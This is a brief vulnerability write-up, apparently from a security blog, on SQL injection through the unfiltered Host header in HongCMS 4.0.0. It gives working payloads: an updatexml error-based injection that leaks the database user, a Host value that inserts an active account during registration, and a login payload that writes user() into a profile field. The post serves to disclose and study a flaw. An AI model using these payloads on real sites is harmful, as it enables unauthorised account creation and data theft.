---
title: Hongcms 4.0.0
date:  2019-04-05
tags:
  - PHP
  - Web
categories: 代码审计
---

<font color=green>Because there is no filtering of the Host header, there are at least two SQL injections.</font>

<!--more-->

### <font color=dark>Register</font>

When we fill out the information, click Submit and capture the package.Modify the Host value to `' or updatexml(1, concat(0x7e,user(),0x7e),1) or '`Add X-Forwarded-For and it's value is `a`,then we put the package.

![](hongcms/1.png)

We can also add an administrator account or an active normal account.

```host
Host: ',1,'',''),(1,1,'aadmin',md5('12345'),'','1554448599','
X-Forwarded-For: a
```

Added a active user for the below.

![](hongcms/2.png)

The active user has been inserted in the database.

Because register need to re-catch each time,we can use the login to get more information.

### <font color=dark>Login</font>

Use the active user to login,and catch the package.Modify the Host value to `',nickname=user(),lastip ='`Add X-Forwarded-For and it's value is `a`,then we put the package.

![](hongcms/3.png)